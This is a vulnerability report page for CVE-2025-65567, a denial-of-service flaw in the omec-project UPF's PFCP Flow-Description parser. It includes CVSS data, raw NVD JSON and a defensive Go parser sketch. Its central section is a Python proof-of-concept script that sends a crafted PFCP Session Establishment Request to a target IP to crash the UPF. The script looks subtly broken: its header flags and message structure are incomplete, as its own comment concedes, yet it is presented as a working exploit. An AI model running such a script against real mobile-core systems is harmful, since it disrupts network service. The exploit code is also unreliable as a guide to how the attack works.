Security Vulnerability Report
CVE-2025-65567 CVSS 7.5 HIGH

CVE-2025-65567

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:06:42

Description

A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF.
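The description attributes the crash to parseFlowDesc reading past the end of its input. The sketch below is an added example, not code from omec-project or from this page: a Go Flow-Description parser that reads tokens only through a bounds-checked cursor and returns an error on malformed input. The `flowRule` type, the `parseFlowDescSafe` name and the simplified `action dir proto from SRC [ports] to DST [ports]` grammar are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// flowRule is a reduced, hypothetical result type for this example.
type flowRule struct{ Action, Dir, Proto, Src, SrcPort, Dst, DstPort string }

var errBadFlowDesc = errors.New("malformed flow description")

// parseFlowDescSafe parses "action dir proto from SRC [ports] to DST [ports]".
// Tokens are read only through a bounds-checked cursor, never by raw index.
func parseFlowDescSafe(desc string) (*flowRule, error) {
	tok, pos := strings.Fields(desc), 0
	next := func() string { // "" once the input is exhausted
		if pos >= len(tok) {
			return ""
		}
		pos++
		return tok[pos-1]
	}
	r := &flowRule{Action: next(), Dir: next(), Proto: next()}
	okHead := (r.Action == "permit" || r.Action == "deny") &&
		(r.Dir == "in" || r.Dir == "out") && r.Proto != "" && next() == "from"
	if r.Src = next(); !okHead || r.Src == "" || r.Src == "to" {
		return nil, errBadFlowDesc
	}
	t := next()
	if t != "to" { // optional source port(s)
		r.SrcPort, t = t, next()
	}
	if r.Dst = next(); t != "to" || r.Dst == "" {
		return nil, errBadFlowDesc
	}
	r.DstPort = next() // optional destination port(s); "" when absent
	if pos < len(tok) { // reject trailing tokens
		return nil, errBadFlowDesc
	}
	return r, nil
}

func main() { // constructed inputs: one well-formed, one truncated
	for _, d := range []string{"permit out ip from 10.0.0.1/32 8080 to assigned", "permit out ip from"} {
		r, err := parseFlowDescSafe(d)
		fmt.Printf("%q -> %+v, %v\n", d, r, err)
	}
}
```

Rejecting the rule with an error lets the PFCP handler answer the request with a failure cause while the process keeps running.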

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:* - VULNERABLE
upf-epc-pfcpiface 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# PFCP Header Structure
# Version(3bit) | MP(1bit) | S(1bit) | PN(3bit) | Message Type(8bit) | Length(24bit)
def build_pfcp_header(msg_type, length, sequence=1):
    # Version=1, MP=0, S=1, PN=1
    flags = (1 << 5) | (1 << 3) | 0x01
    header = bytes([flags, msg_type])
    header += struct.pack('!I', length)[1:]  # 3 bytes for length
    header += struct.pack('!I', sequence)[1:]  # 3 bytes for sequence
    return header

def build_create_pdr_with_malformed_flow_desc():
    # IE Type for CreatePDR
    create_pdr_ie_type = 0x01
    # Malformed Flow Description - exceeds buffer bounds
    # This will cause parseFlowDesc to read beyond allocated buffer
    malformed_flow_desc = b'\x00' * 256 + b'invalid data'
    # Flow Description IE: Type=14, Length, Flow Description content
    flow_desc_ie = struct.pack('!B', 14)  # IE Type
    flow_desc_ie += struct.pack('!I', len(malformed_flow_desc))[1:]
    flow_desc_ie += malformed_flow_desc
    # CreatePDR IE with malformed content
    create_pdr = flow_desc_ie  # Simplified - actual implementation needs proper IEs
    # IE header
    ie_data = struct.pack('!B', create_pdr_ie_type)
    ie_data += struct.pack('!I', len(create_pdr))[1:]
    ie_data += create_pdr
    return ie_data

def build_pfcp_session_establishment_request():
    # Message Type for Session Establishment = 0x11
    msg_type = 0x11
    # Build CreatePDR with malformed Flow Description
    create_pdr = build_create_pdr_with_malformed_flow_desc()
    # Calculate total length (IE headers + content)
    total_length = len(create_pdr)
    # Build PFCP Header
    header = build_pfcp_header(msg_type, total_length)
    # Combine header and IE
    return header + create_pdr

def exploit_cve_2025_65567(target_ip, target_port=8805):
    """
    PoC for CVE-2025-65567
    Sends a crafted PFCP Session Establishment Request with malformed
    Flow-Description to trigger buffer over-read in parseFlowDesc function,
    causing DoS.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    payload = build_pfcp_session_establishment_request()
    print(f"[*] Sending malicious PFCP request to {target_ip}:{target_port}")
    print(f"[*] Payload length: {len(payload)} bytes")
    sock.sendto(payload, (target_ip, target_port))
    print("[+] Malicious request sent")
    print("[*] Target UPF should crash/panic due to buffer over-read")
    sock.close()

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_65567_poc.py <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8805
    exploit_cve_2025_65567(target, port)
```

References

https://github.com/omec-project/upf/issues/959 (Exploit, Issue Tracking, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65567", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:34.190", "lastModified": "2026-01-07T21:06:42.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (pfcpiface component) in version upf-epc-pfcpiface:2.1.3-dev. After PFCP association, a specially crafted PFCP Session Establishment Request with a CreatePDR that contains a malformed Flow-Description is not robustly validated. The Flow-Description parser (parseFlowDesc) can read beyond the bounds of the provided buffer, causing a panic and terminating the UPF process. An attacker who can send PFCP Session Establishment Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennetworking:upf:2.1.3:dev:*:*:*:*:*:*", "matchCriteriaId": "E580395D-12BF-4D0A-AA6F-FD59C36E1EED"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/959", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/omec-project/upf/issues/959", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", 
"tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}